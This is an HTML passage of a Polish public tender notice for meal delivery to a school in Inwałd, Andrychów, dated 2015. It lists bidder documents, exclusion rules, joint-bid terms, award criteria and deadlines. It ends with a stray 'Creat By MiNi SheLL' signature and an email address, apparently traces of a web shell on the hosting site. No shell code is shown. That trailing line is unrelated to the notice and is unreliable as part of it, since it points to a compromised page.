<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	formularz ofertowy (według wzoru - załącznik nr 4 do SIWZ).

2.	listę pomiotów należących do tej samej grupy kapitałowej (w rozumieniu ustawy z dnia 16 lutego              2007 r. o ochronie konkurencji i konsumentów Dz. U . Nr 50 poz.331 z późn . zm. )w przypadku gdy Wykonawca należy do grupy kapitałowej .

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Pisemne  zobowiązanie podmiotu trzeciego, należy załączyć do oferty w oryginale, zawierające podpis podmiotu trzeciego pod treścią oświadczenia . 


Jeżeli Wykonawca polega na zdolnościach finansowych innych podmiotów za zasadach określonych              w art. 26 ust. 2b ustawy Prawo zamówień publicznych, to Zamawiający wymaga przedłożenia informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których ten podmiot posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową podmiotu, wystawionej nie wcześniej niż 3 miesiące przed upływem składania ofert.

Dotyczy Wykonawców składających wspólną ofertę:
W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Dokumenty, o których mowa w SIWZ w Dziale III.2 pkt A 1, 2, 3 oraz pkt. C 1, składają wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia lub ich pełnomocnik. 
Dokumenty, o których mowa w SIWZ w Dziale III.2 pkt B 1, 2 oraz  C 2 składa we własnym imieniu każdy z podmiotów wspólnie ubiegających się o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Odległość miejsca przygotowywania posiłków od miejsca ich dostarczania - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.andrychow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W sekretariacie Zespołu Szkół Samorządowych w Inwałdzie, ul. Wadowicka 79, 34-120 Andrychów, w godzinach od 8:00 do 15:00 w dniach pracy szkoły lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2015 godzina 10:15, miejsce: Zespół Szkół Samorządowych w Inwałdzie, ul. Wadowicka 79, w gabinecie Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com